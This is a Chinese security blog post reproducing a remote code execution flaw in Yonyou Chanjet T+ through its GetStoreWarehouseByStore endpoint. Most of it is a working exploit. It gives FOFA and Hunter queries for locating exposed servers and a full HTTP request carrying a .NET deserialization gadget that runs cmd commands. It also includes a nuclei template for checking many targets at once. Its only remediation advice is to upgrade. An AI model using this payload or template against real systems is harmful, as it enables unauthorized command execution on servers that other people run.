(附nuclei 批量验证文件)用友 畅捷通T+ GetStoreWarehouseByStore RCE漏洞复现

(附nuclei 批量验证文件)用友 畅捷通T+ GetStoreWarehouseByStore RCE漏洞复现

声明
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。

1、漏洞简介

用友 畅捷通T+ GetStoreWarehouseByStore RCE漏洞可执行命令。

2、资产指纹

fofa:app=“畅捷通-TPlus”
hunter: app.name=“畅捷通 T+”

3、漏洞复现

发送以下请求执行whoami命令进行测试

POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
Host: {{Hostname}}
User-Agent: Java/1.8.0_381
Content-Length: 579
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Content-type: application/x-www-form-urlencoded
X-Ajaxpro-Method: GetStoreWarehouseByStore
Accept-Encoding: gzip, deflate

{
  "storeID":{
    "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
    "MethodName":"Start",
    "ObjectInstance":{
      "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
      "StartInfo":{
        "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
        "FileName":"cmd",
        "Arguments":"/c whoami >ee.txt"
      }
    }
  }
}

在这里插入图片描述
在这里插入图片描述

4、nuclei yaml文件

id: chanjettplus-rce

info:
  name: chanjettplus rce
  author: xxxx
  severity: critical
  description: |
    畅捷通反序列化可执行命令
  tags: chanjettplus,rce

http:
  - raw:
    - |
      POST /tplus/ajaxpro/Ufida.T.CodeBehind._PriorityLevel,App_Code.ashx?method=GetStoreWarehouseByStore HTTP/1.1
      X-Ajaxpro-Method: GetStoreWarehouseByStore
      User-Agent: Java/1.8.0_381
      Host: {{Hostname}}
      Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
      Content-type: application/x-www-form-urlencoded
      Content-Length: 566
      Connection: close
      
      {
        "storeID":{
          "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
          "MethodName":"Start",
          "ObjectInstance":{
            "__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
            "StartInfo":{
              "__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
              "FileName":"cmd",
              "Arguments":"/c whoami >ee.txt"
            }
          }
        }
      }
    - |
      GET /tplus/ee.txt HTTP/1.1
      Host: {{Hostname}}
      Upgrade-Insecure-Requests: 1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36


    matchers:
      - type: dsl
        dsl:
          - 'status_code_2==200 && contains_all(body_2,"sys")'

修复方式

关注用友官网,及时升级至最新版本。

评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值